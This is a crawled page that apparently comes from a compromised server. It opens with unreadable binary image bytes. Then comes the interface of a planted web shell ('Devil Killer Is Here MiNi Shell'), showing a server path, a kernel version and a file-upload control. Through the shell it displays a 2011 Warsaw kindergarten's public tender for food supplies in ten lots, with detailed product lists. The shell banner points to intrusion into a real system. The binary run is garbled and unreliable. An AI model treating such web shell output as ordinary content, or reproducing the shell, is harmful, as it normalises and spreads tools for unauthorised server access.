JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/413146-N-2011.html

<p class="kh_header"><b>Warszawa: Dostawa artykułów spożywczych z podziałem na 10 pakietów</b><br>
<b>Numer ogłoszenia: 413146 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Integracyjne nr 8 , ul. Karmelicka 3b, 00-149 Warszawa, woj. mazowieckie, tel. 022 831 01 21, faks 022 831 01 21.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.p8w-wa.wikom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów spożywczych z podziałem na 10 pakietów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów spożywczych z podziałem na 10 pakietów - zgodnie z SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.51.00.00-6, 03.22.00.00-9, 15.10.00.00-9, 15.89.60.00-5, 03.31.10.00-2, 03.14.25.00-3, 15.80.00.00-6, 41.11.00.00-3, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.p8w-wa.wikom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Karmelicka 3 B, 00-149 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2011 godzina 10:00, miejsce: Przedszkole Integracyjne Nr 8, ul. Karmelicka 3 B, 00-149 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bułka tarta 0,45 kg	szt.	20,
Bułka wrocławska 0,3	szt.	694,
Chałka  masa 300 g	szt.	91, 
Chleb biały krojony 	szt.	228,
Chleb razowy krojony	szt.	149,
Chleb staropolski krojony	szt.	241,
Bułeczki pszenne kajzerki  - 45g, świeże	szt.	221,
Chleb z dynią krojony	szt.	98,
Chleb ze słonecznikiem krojony	szt.	126,
Grahamka	szt.	552,
Rogalik maślany	szt.	256,
Drożdżówki różne - masa netto 80 g. świeża	szt.	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serek waniliowy typu Danio lub równoważny	szt.	289,
Deser typu Monte lub równoważny	szt.	115,
Jogurt  naturalny  typu Danone -  ok. 370 g	szt.	52,
Jogurt  typu Danone lub równoważny	szt.	330,
Masło extra o zawartości tłuszczu 82% bez dodatku tłuszczów roślinnych  - opakowanie folia aluminiowa z nadrukiem - 200 g	szt.	1020,
Mleko spożywcze, pasteryzowane, homogenizowane  -  zawartość  tłuszczu 3,2% opakowanie - karton  1l  - w tym  ? ilości z dotowanego  Programu  Agencji Rynku Rolnego Szklanka mleka 	litr	2700,
Napój z mleka fermentowanego z żywymi kulturami bakterii, owocowy, opakowanie -  buteleczka 
100 ml 	szt.	148,
Ser topiony śmietankowy -  40 % tł. w 100 g, prostokąty	szt.	303,
Ser żółty łagodny, zawartość tłuszczu 45%, sera w serze 90%, dotowany z Programu  Agencji Rynku Rolnego Szklanka mleka	kg	58,
Serek wzbogacony o witaminę D, opakowanie - kubeczek 50 g	szt.	330,
Śmietana do zupy zaw. tł. 18%, opakowanie - kubek 400 ml	szt.	736,
Śmietanka do ciast i deserów 30% tłuszczu,  wartość energetyczna w 100g produktu - 290 kcal, składnik dodatkowy: stabilizator - karagen ,  opakowanie - kartonik - 500ml,	szt.	8,
Twaróg półtłusty, kl.I , mielony  zawartość tłuszczu 3,5%  - opakowanie folia o pojemności 250g,
	kg	150,
Twaróg półtłusty, kl.I , zawartość tłuszczu 3,5%  - opakowanie folia o pojemności 250g,
	kg	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.51.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WARZYWA, OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz - Klasa I lub II wg Rozporządzenie Komisji WE nr 1093/97	kg	45,
Banany- Klasa I lub II, wg Rozporządzenie Komisji WENR 2257/94	kg	530,
Biała rzepa	kg	15,
Botwina w pęczkach - świeża, sprężysta, bez śladów nadpsucia	szt.	8,
Brokuły -  świeże o różyczkach zwartych , intensywnie zielonych, bez pleśni i  nadpsucia	szt.	30,
Brzoskwinie lub morele -  dojrzałe, nie przejrzałe, bez śladów obicia i nadpsucia, kl. I	kg	21,
Buraki -  czerwone, okrągłe, konsumpcyjne, wielkość średnia	kg	202,
Cebula zwyczajna - wielkość średnia	kg	61,
Cykoria 	kg	5,
Cytryny - soczyste o gładkiej skórce bez śladów nadpsucia, kl. I	kg	25,
Czereśnie	kg	10,
Czosnek, duże główki o lekko fioletowym zabarwieniu, świeży bez cech nadpsucia	szt.	12,
Gruszki - soczyste - typu konferencja lub klapsa, bez cech nadpsucia	kg	280,
Jabłka -soczyste, słodko winne - typu cortland, ligol, champion, delikates, rubin, jonagored - nie obite i bez cech nadpsucia o średniej wielkości	kg	1600,
Kalafior świeży, różyczki białe, zwarte	szt.	60,
Kalarepka	szt.	22,
Kapusta biała -wielkość jednej główki - 2 kg, świeża, zdrowa, bez cech nadpsucia	kg	29,
Kapusta czerwona - główka -  2-2,5kg, główka zwarta, ścisła, zdrowa, bez śladów nadpsucia	kg	15,
Kapusta kiszona czerwona,  nie przekwaszona, o zapachu delikatnym, opakowanie - wiaderko plastikowe 5kg	kg	5,
Kapusta kiszona, jasna, nie przekwaszona, o zapachu delikatnym, opakowanie - wiaderko plastikowe 5kg	kg	125,
Kapusta pekińska - główka - około 1 - 1,5kg, zwarta, zdrowa, bez cech nadpsucia	kg	50,
Kiwi - sztuki ( na palecie, nie w koszyczku), twarde, dojrzałe, bez cech nadpsucia, kl. I 	szt.	360,
Koperek zielony  - pęczki, świeży, nie zwiędły, o wadze określonej sezonowo, o barwie intensywnej ciemno zielonej i właściwym zapachu, bez cech nadpsucia.	szt.	240,
Mandarynki bezpestkowe, soczyste, nie wyschnięte; skórka gładka,  łatwo odchodząca; zdrowe, bez cech nadpsucia 	kg	55,
Marchew, karotka, umyta, bez cech nadpsucia, średniej wielkości	kg	610,
Natka pietruszki świeża - pęczki, nie zwiędła,  o wadze określonej sezonowo, zdrowy ciemno-zielony kolor, bez cech nadpsucia	szt.	230,
Nektarynki - dojrzałe, średniej wielkości, nie obite, kl. I, bez cech nadpsucia i pleśni	kg	6,
Ogórki kiszone, nie przekwaszone, twarde, bez cech nadpsucia, opakowanie - wiaderko plastikowe 6kg	kg	    160,
Ogórki świeże - krótkie lub węże, szklarniowe lub gruntowe - w zależności od sezonu, twarde, zdrowe-nie nadpsute, kl. I	kg	140,
Papryka czerwona - dojrzała, świeża, jędrna, dojrzała, bez cech nadpsucia, kl. I	kg	52,
Pieczarki świeże , bez plam  i cech nadpsucia	kg	50,
Pietruszka - zdrowy korzeń bez brązowych przebarwień wewnątrz, nie zwiędła, wielkość średnia; umyta, bez cech nadpsucia	kg	210,
Pomarańcza, typu Nowelina, gładka, jasna, cienka skórka, bez cech nadpsucia kl. I	kg	50,
Pomidor - mięsisty, świeży, czysty, czerwony-wybarwiony, produkt polski, w opakowaniu 6kg, kl. I extra, bez cech nadpsucia	kg	240,
Por - zdrowy, zwarty, bez cech nadpsucia, 	kg	160,
Rzodkiewka - pęczki - czerwona okrągła, młoda, świeża, słodka - nie piekąca, bez cech nadpsucia	szt. 	170,
Sałata lodowa świeża bez cech nadpsucia	szt.	20,
Sałata świeża, intensywnie zielona 	szt.	300,
Seler - biały, umyty, wielkość średnia, bez cech nadpsucia	kg	260,
Szczypiorek - cienki - pęczki -wielkość sezonowa, zdrowy, sprężysty bez cech nadpsucia	szt.	80,
Śliwki typu - węgierka, Stanley, wybarwione, w dojrzałości konsumpcyjnej, odchodząca od pestki, bez cech nadpsucia 	kg	50,
Truskawka, odmiana konsumpcyjna polska, zdrowa, dojrzała,  wybarwiona, bez cech nadpsucia 	kg	      12,
Winogrona ciemne  - kiście zagraniczne - słodkie, bez pleśni i cech nadpsucia, kl. I	kg	10,
Winogrona jasne - kiście zagraniczne, słodkie, bez cech nadpsucia, kl. I 	kg	70,
Ziemniaki młode- irga konsumpcyjna, umyta, zdrowa, nie nadmrożona, skórka bez zielonych zabarwień, bez kiełkujących oczek,   wielkość średnia, bez cech nadpsucia	kg	1600.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO, WĘDLINY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Biodro kurczaka świeże, nie rozmrażane	kg.	82,
Boczek wędzony	kg	4,
Cielęcina zadnia, świeża- nie rozmrażana kawałki 1-1,5 kg	kg.	10,
Filet z indyka pieczony, produkt blokowy grubo rozdrobniony, mięso z indyka 72,5%	kg.	30,
Filet z indyka w przedziale wagowym 1 kg -1,5kg, świeży, bez skóry, bez kości -nie rozmrażany	kg.	85,
Hamburgery drobiowe w opakowaniach hermetycznych 	Op.	7,
Kiełbasa biała surowa	kg	6,
Kiełbasa cienka typu podwawelska, toruńska, mięso wieprzowe 84,9%	kg.	8,
Kiełbasa krakowska podsuszana, grubo rozdrobniona, wysoko wydajna, mięso wieprzowe 96%	kg.	18,
Kiełbasa szynkowa	kg.	8,
Kiełbasa żywiecka drobiowa średnio rozdrobniona, podsuszana, wędzona, 100g gotowego produktu uzyskano ze 121 g mięsa wieprzowego	kg.	8,
Kurczak świeży cały, patroszony, 1,5- 2 kg - nie rozmrażany	kg.	124,
Łopatka wieprzowa, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeża nie rozmrażana; kawałki ok.1- 1,5 kg	kg.	115,
Mięso wołowe  zrazowe z młodych sztuk, bez skóry, bez kości, bez wierzchniej warstwy tłuszczu, świeże nie rozmrażane kawałki po 1- 1,5 kg	kg.	66,
Ogonówka wędzona	kg.	4,
Parówki cielęce odtłuszczone, 	kg.	      31,
Piersi z kurczaka, świeże nie rozmrażane, pojedyncze	kg.	34,
Polędwica wiejska, wysoko wydajna, mięso wieprzowe 74%	kg.	5,
Polędwiczki wieprzowe słodkie	kg.	37,
Schab środkowy bez kości, o średnicy nie większej niż 10cm, świeży, nie rozmrażany, kawałki 1,5- 2 kg	kg.	62,
Szynka konserwowa 	kg.	8,
Szynka wiejska 	kg.	11,
Szynka wiejska- wędzonka parzona, mięso wieprzowe 83%	kg.	14,
Szynka wieprzowa bez kości, bez tłuszczu,
Kawałki wielkości 1- 1,5 kg, świeże, nie rozmrażane 	kg.	82,
Szynka z komina, 78% mięsa wieprzowego	kg.	20,
Udziec z indyka, bez skóry, bez kości, świeży- nie rozmrażany 50-70 dkg	kg.	13,
Wołowe z udźca, bez kości kl. I ,świeże, nie rozmrażane, z młodych sztuk 1- 1,5 kg	kg.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł mrożony 	kg	110,
Brukselka mrożona	kg	115,
Fasolka szparagowa mrożona	kg	132,
Kalafior mrożony	kg	130,
Marchew mrożona juniorka	kg	112,
Marchew mrożona kostka	kg	143,
Marchew mrożona plastry	kg	6,
Mieszanka owocowa mrożona	kg	472,
Paluszki rybne z fileta	kg	63,
Szpinak mrożony 	kg	17,
Truskawka mrożona 	kg	247,
Wiśnia mrożona 2,5 kg	kg	10,
Włoszczyzna mrożona	kg 	14.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.60.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet z dorsza, nie więcej niż 3% glazury technologicznej, opakowanie SHP	kg	6,
Filet z mintaja, nie więcej niż 3% glazury technologicznej, opakowanie SHP	kg	14,
Filet z miruny mrożony, nie więcej niż 3% glazury technologicznej, opakowanie SHP	kg	21,
Filet z morszczuka mrożony, nie więcej niż 3% glazury technologicznej, opakowanie SHP	kg	86,
Makrela wędzona, świeża, duże tuszki, zapakowana hermetycznie 	kg	36,
Filet z łososia świeży	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.31.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja świeże, nie starsze niż 7 dni od daty pakowania, o oznaczeniu: 3 - jaja z chowu klatkowego, A, L - duże 63 - 73 g	szt.	4000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PRODUKTY OGÓLNOSPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ananas kawałki w lekkim syropie, opakowanie -  puszka 580 g	szt.	10,
Ananas plastry w  lekkim syropie, opakowanie - puszka 3035 g	szt.	23,
Biały barszcz typu Winiary	szt.	130,
Biszkopty opakowanie 140 g	szt.	40,
Brzoskwinie połówki w lekkim syropie, opakowanie 800 dag.	szt.	25,
Budyń śmietankowy z cukrem typu Winiary
	szt.	211,
Ciastka	kg	30,
Cukier biały- drobny kryształ  - paczkowany 1kg	kg	320,
Cukier puder opakowanie 500 g	kg	3,
Cukier wanilinowy 16g	szt.	12,
Cukierki	kg.	2,
Cynamon	szt.	3,
Czekolada mleczna	szt.	12,
Dżem brzoskwiniowy niskosłodzony, wsad owocowy  ~40g owoców / 100 g produktu, op. -  słoik 300 g	szt.	15,
Dżem truskawkowy niskosłodzony , wsad owocowy ~40g owoców/100g produktu, op. słoik 300g	szt.	6,
Dżem z owoców lesnych  niskosłodzony, wsad owocowy  ~40g owoców / 100 g produktu, op. -  słoik 300 g	szt.	8,
Fasola biała drobna - op.3 kg	kg	7,
Galaretka owocowa	szt.	80,
Groch łuskany - połówki	kg	20,
Herbata  ziołowa - Mięta - opakowanie - 20 torebek x 2 g	szt.	4,
Herbata czarna ekspresowa, opakowanie - 100 torebek x 2 g	szt.	20,
Herbata owocowa - ( hibiskus, aronia, jabłko, jeżyny, owoc dzikiej róży, skórki cytrynowe, owoc brzoskwini, owoc jagody, owoc truskawki ) - opakowanie - 20
torebek x 2 g	szt. 	4,
Herbatniki  typu PETIT BEURRE	op.	70,
Kakao naturalne	szt.	25,
Kasza gryczana prażona cała - opakowanie 0,4 kg typu Szczytno	kg	46,
Kasza jęczmienna perłowa, biała, łamana drobna typu Szczytno	kg	58,
Kasza manna - op. 1kg	kg	29,
Kawa rozpuszczalna zbożowa - op. 150g	szt.	11,
Ketchup łagodny, opakowanie 480 g typu Pudliszki	szt.	27,
Kisiel z cukrem, różne smaki, opakowanie
	szt.	156,
Koncentrat pomidorowy, zawartość ekstraktu 30% + -2%	szt. 	202,
Krem do smarowania z orzechami laskowymi - zawartość  13%, opakowanie - słoik  300 g - wartość: energetyczna w 100g produktu 530 kcal, białka 6,4 typu Nutella	szt.	20,
Kukurydza konserwowa puszka 340 g po odsączeniu masa netto 280 g	szt.	17,
Kwasek cytrynowy 20 g	szt.	3,
Lizaki	szt.	80,
Majeranek - ziele suche otarte - op. 8g	szt. 	25,
Majonez  opakowanie - słoik - 750ml typu Mosso	szt. 	46,
Makaron  krajanka   -  op. 0,4 kg	szt.	40,
Makaron  nitki nr  2 - op. 0,5 kg	szt.	140,
Makaron drobny  gwiazdeczki - op.	szt.	6,
Makaron łazanka - op. 0,5 kg	szt.	8,
Makaron świderki   - op. 0,5 kg	szt.	140,
Makaron zacierka - op. 250 g	szt.	67,
Makrela w pomidorach - puszki	szt.	168,
Mąka pszenna TYP 480 - op. 1kg	kg	117,
Mąka ziemniaczana - op. 1kg	kg	2,
Mikołaje  czekoladowe - małe	szt.	80,
Miód naturalny  pszczeli - wielokwiatowy nektarowy  - opakowanie - słoik 400g - wartość energetyczna w 100g produktu 1334kJ/319kcal	szt.	14,
Musztarda, opakowanie 1l	szt.	1,
Napój owocowy 0,2 l	szt.	60,
Olej  słonecznikowy  z pierwszego tłoczenia - op. 1l	szt.	78,
Owoce suszone ( rodzynki, morele, śliwki, daktyle )	kg	1,
Pasztet z drobiu	szt.	145,
Pieprz czarny mielony naturalny  - op.20g	szt.	12,
Płatki  jęczmienne błyskawiczne - op. 400g	szt.	21,
Płatki do mleka - Kwadraciki z pełnego ziarna pszenicy o smaku cynamonowym- op. 500 g - wartość energetyczna w 100g produktu 412 kcal - zawartość mąki pszennej pełnoziarnistej 31,1%, substancje wzbogacające: witamina C, niacyna, kwas pantotenowy, witaminy z grupy B, żelazo zredukowane, węglan wapnia.	szt.	4,
Płatki do mleka - Zbożowe kółeczka z miodem - op. 500 g - wartość energetyczna w 100g produktu 369 kcal, zawartość mąk pełnoziarnistych 64,6%, miodu 4,1%	szt.	8,
Płatki do mleka - Zbożowe kuleczki łódeczki o smaku czekoladowym op. 500 g - wartość energetyczna w 100g produktu 379 kcal, zawartość mąki 63%, kakao 5,6%, kakao o obniżonej zawartości tłuszczu 0,5%	szt.	50,
Płatki kukurydziane  - op. 500g	Szt.	70,
Płatki owsiane górskie błyskawiczne - op. 400g	szt.	19,
Przyprawa - papryka słodka	szt.	4,
Rurki waflowe	kg.	4,
